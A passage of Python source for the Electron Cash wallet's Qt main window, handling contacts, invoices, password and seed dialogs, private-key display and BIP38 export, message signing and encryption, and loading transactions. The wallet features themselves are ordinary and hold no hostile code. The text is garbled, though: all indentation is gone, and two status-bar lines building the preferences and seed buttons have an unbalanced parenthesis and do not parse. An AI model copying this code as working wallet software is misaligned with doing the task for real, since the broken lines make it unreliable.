Note that duplicate contacts will not be added multiple times, but in
that case the returned value would still be a valid Contact.
Returns None on failure.'''
assert typ in ('address', 'cashacct')
contact = None
if typ == 'cashacct':
tup = self.resolve_cashacct(label) # this displays an error message for us
if not tup:
self.contact_list.update() # Displays original
return
info, label = tup
address = info.address.to_ui_string()
contact = Contact(name=label, address=address, type=typ)
elif not Address.is_valid(address):
# Bad 'address' code path
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return
else:
# Good 'address' code path...
contact = Contact(name=label, address=address, type=typ)
assert contact
if replace != contact:
if self.contacts.has(contact):
self.show_error(_(f"A contact named {contact.name} with the same address and type already exists."))
self.contact_list.update()
return replace or contact
self.contacts.add(contact, replace_old=replace, unique=True)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact2', contact, replace)
return contact
def delete_contacts(self, contacts):
n = len(contacts)
qtext = ''
if n <= 3:
def fmt(contact):
if len(contact.address) > 20:
addy = contact.address[:10] + '…' + contact.address[-10:]
else:
addy = contact.address
return f"{contact.name} <{addy}>"
names = [fmt(contact) for contact in contacts]
contact_str = ", ".join(names)
qtext = _("Remove {list_of_contacts} from your contact list?").format(list_of_contacts = contact_str)
else:
# Note: we didn't use ngettext here for plural check because n > 1 in this branch
qtext = _("Remove {number_of_contacts} contacts from your contact list?").format(number_of_contacts=n)
if not self.question(qtext):
return
removed_entries = []
for contact in contacts:
if self.contacts.remove(contact):
removed_entries.append(contact)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts2', removed_entries)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
ext = pr.export_file_ext()
fn = self.getSaveFileName(_("Save invoice to file"), "*." + ext)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.export_file_data())
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self._search_box_spacer = QWidget()
self._search_box_spacer.setFixedWidth(6) # 6 px spacer
self.search_box = QLineEdit()
self.search_box.setPlaceholderText(_("Search wallet, {key}F to hide").format(key='Ctrl+' if sys.platform != 'darwin' else '⌘'))
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box, 1)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
self.update_cashaddr_icon()
sb.addPermanentWidget(self.addr_converter_button)
self.addr_converter_button.setHidden(self.gui_object.is_cashaddr_status_button_hidden())
self.gui_object.cashaddr_status_button_hidden_signal.connect(self.addr_converter_button.setHidden)
q_icon_prefs = QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog)
sb.addPermanentWidget(StatusBarButton(q_icon_prefs))
q_icon_seed = QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog)
self.seed_button = StatusBarButton(q_icon_seed)
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak.ref(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf()))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they dont interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
self.preview_button.setVisible(True)
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
self.gui_object.cache_password(self.wallet, None) # clear password cache when user changes it, just in case
run_hook("on_new_password", self, password, new_password)
except BaseException as e:
self.show_error(str(e))
return
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def get_passphrase_dialog(self, msg : str, title : str = None, *, permit_empty = False) -> str:
from .password_dialog import PassphraseDialog
d = PassphraseDialog(self.wallet, self.top_level_window(), msg, title, permit_empty = permit_empty)
return d.run()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.balance_label.setHidden(True)
self.statusBar().insertWidget(0, self._search_box_spacer)
self._search_box_spacer.show()
self.search_box.setFocus(1)
if self.search_box.text():
self.do_search(self.search_box.text())
else:
self._search_box_spacer.hide()
self.statusBar().removeWidget(self._search_box_spacer)
self.balance_label.setHidden(False)
self.do_search('')
def do_search(self, t):
'''Apply search text to all tabs. FIXME: if a plugin later is loaded
it will not receive the search filter -- but most plugins I know about
do not support searchable_list anyway, so hopefully it's a non-issue.'''
for i in range(self.tabs.count()):
tab = self.tabs.widget(i)
try:
tab.searchable_list.filter(t)
except (AttributeError, TypeError):
pass
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(350)
line2 = QLineEdit()
line2.setFixedWidth(350)
grid.addWidget(QLabel(_("Name")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Address")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
name = line1.text().strip()
address = line2.text().strip()
prefix = networks.net.CASHADDR_PREFIX.lower() + ':'
if address.lower().startswith(prefix):
address = address[len(prefix):]
self.set_contact(name, address)
def lookup_cash_account_dialog(self):
blurb = "<br><br>" + _('Enter a string of the form <b>name#<i>number</i></b>')
cashacctqt.lookup_cash_account_dialog(self, self.wallet, blurb=blurb,
add_to_contacts_button = True, pay_to_button = True)
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password) # may be None or ''
derivation = keystore.has_derivation() and keystore.derivation # may be None or ''
seed_type = getattr(keystore, 'seed_type', '')
if derivation == 'm/' and seed_type in ['electrum', 'standard']:
derivation = None # suppress Electrum seed 'm/' derivation from UI
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self.top_level_window(), seed, passphrase, derivation, seed_type)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
pk_lbl = QLabel(_("Private key") + ':')
vbox.addWidget(pk_lbl)
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
# BIP38 Encrypt Button
def setup_encrypt_button():
encrypt_but = QPushButton(_("Encrypt BIP38") + "...")
f = encrypt_but.font(); f.setPointSize(f.pointSize()-1); encrypt_but.setFont(f) # make font -= 1
encrypt_but.setEnabled(bool(bitcoin.Bip38Key.canEncrypt()))
encrypt_but.setToolTip(_("Encrypt this private key using BIP38 encryption")
if encrypt_but.isEnabled() else
_("BIP38 encryption unavailable: install pycryptodomex to enable"))
border_color = ColorScheme.DEFAULT.as_color(False)
border_color.setAlphaF(0.65)
encrypt_but_ss_en = (
keys_e.styleSheet() + (("QPushButton { border: 1px solid %s; border-radius: 6px; padding: 2px; margin: 2px; } "
"QPushButton:hover { border: 1px solid #3daee9; } "
"QPushButton:disabled { border: 1px solid transparent; ") % (border_color.name(QColor.HexArgb)))
)
encrypt_but_ss_dis = ( keys_e.styleSheet() )
encrypt_but.setStyleSheet(encrypt_but_ss_en if encrypt_but.isEnabled() else encrypt_but_ss_dis)
def on_encrypt():
passphrase = self.get_passphrase_dialog(
msg = (
_("Specify a passphrase to use for BIP38 encryption.") + "\n" +
_("Save this passphrase if you save the generated key so you may decrypt it later.")
)
)
if not passphrase:
return
try:
bip38 = str(bitcoin.Bip38Key.encrypt(pk, passphrase))
keys_e.setText(bip38)
encrypt_but.setEnabled(False)
encrypt_but.setStyleSheet(encrypt_but_ss_dis)
pk_lbl.setText( _("BIP38 Key") + ":" )
self.show_message(_("WIF key has been encrypted using BIP38.\n\n"
"You may save this encrypted key to a file or print out its QR code and/or text.\n\n"
"It is strongly encrypted with the passphrase you specified and safe to store electronically. "
"However, the passphrase should be stored securely and not shared with anyone."))
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
encrypt_but.clicked.connect(on_encrypt)
keys_e.addWidget(encrypt_but, 0)
setup_encrypt_button()
# /BIP38 Encrypt Button
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
msg_sign = ( _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' +
_('The operation is undefined. Not just in Electron Cash, but in general.') )
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None, tx_desc=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx, tx_desc=tx_desc)
def export_bip38_dialog(self):
''' Convenience method. Simply calls self.export_privkeys_dialog(bip38=True) '''
self.export_privkeys_dialog(bip38 = True)
@protected
def export_privkeys_dialog(self, password, *, bip38=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
if bip38:
self.show_error(_('WARNING: This is a multi-signature wallet.') + '\n' +
_("It cannot be used with BIP38 encrypted keys."))
return
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
if bip38:
if not bitcoin.Bip38Key.canEncrypt() or not bitcoin.Bip38Key.isFast():
self.show_error(_("BIP38 Encryption is not available. Please install 'pycryptodomex' and restart Electron Cash to enable BIP38."))
return
passphrase = self.get_passphrase_dialog(
msg = (
_("You are exporting your wallet's private keys as BIP38 encrypted keys.") + "\n\n" +
_("You must specify a passphrase to use for encryption.") + "\n" +
_("Save this passphrase so you may decrypt your BIP38 keys later.")
)
)
if not passphrase:
# user cancel
return
bip38 = passphrase # overwrite arg with passphrase.. for use down below ;)
class MyWindowModalDialog(WindowModalDialog):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
d = MyWindowModalDialog(self.top_level_window(), _('Private keys'))
weak_d = Weak.ref(d)
d.setObjectName('WindowModalDialog - Private Key Export')
destroyed_print_error(d) # track object lifecycle
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
lines = [ _("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.") ]
if bip38:
del lines[0] # No need to scream-WARN them since BIP38 *are* encrypted
msg = '\n'.join(lines)
vbox.addWidget(QLabel(msg))
if bip38:
wwlbl = WWLabel()
def set_ww_txt(pf_shown=False):
if pf_shown:
pf_text = ( ("<font face='{monoface}' size=+1><b>".format(monoface=MONOSPACE_FONT))
+ bip38
+ ('</b></font> <a href="hide">{link}</a>'.format(link=_("Hide"))) )
else:
pf_text = '<a href="show">{link}</a>'.format(link=_("Click to show"))
wwlbl.setText(
_("The below keys are BIP38 <i>encrypted</i> using the passphrase: {passphrase}<br>"
"Please <i>write this passphrase down</i> and store it in a secret place, separate from these encrypted keys."
).format(passphrase=pf_text)
)
def toggle_ww_txt(link):
set_ww_txt(link=="show")
set_ww_txt()
wwlbl.linkActivated.connect(toggle_ww_txt)
vbox.addWidget(wwlbl)
e = QTextEdit()
e.setFont(QFont(MONOSPACE_FONT))
e.setWordWrapMode(QTextOption.NoWrap)
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv' if not bip38 else 'electron-cash-bip38-keys.csv'
select_msg = _('Select file to export your private keys to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addSpacing(12)
vbox.addWidget(box)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
stop = False
def privkeys_thread():
for addr in addresses:
if not bip38:
# This artificial sleep is likely a security / paranoia measure
# to allow user to cancel or to make the process "feel expensive".
# In the bip38 case it's already slow enough so this delay
# is not needed.
time.sleep(0.100)
if stop:
return
try:
privkey = self.wallet.export_private_key(addr, password)
if bip38 and privkey:
privkey = str(bitcoin.Bip38Key.encrypt(privkey, bip38)) # __str__() -> base58 encoded bip38 key
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
private_keys[addr.to_ui_string()] = privkey
strong_d = weak_d()
try:
if strong_d and not stop:
strong_d.computing_privkeys_signal.emit()
else:
return
finally:
del strong_d
if stop:
return
strong_d = weak_d()
if strong_d:
strong_d.show_privkeys_signal.emit()
def show_privkeys():
nonlocal stop
if stop:
return
s = "\n".join('{:45} {}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
stop = True
thr = None
def on_dialog_closed(*args):
nonlocal stop
stop = True
try: d.computing_privkeys_signal.disconnect()
except TypeError: pass
try: d.show_privkeys_signal.disconnect()
except TypeError: pass
try: d.finished.disconnect()
except TypeError: pass
if thr and thr.is_alive():
thr.join(timeout=1.0) # wait for thread to end for maximal GC mojo
def computing_privkeys_slot():
if stop:
return
e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses)))
d.computing_privkeys_signal.connect(computing_privkeys_slot)
d.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
thr = threading.Thread(target=privkeys_thread, daemon=True)
thr.start()
res = d.exec_()
if not res:
stop = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
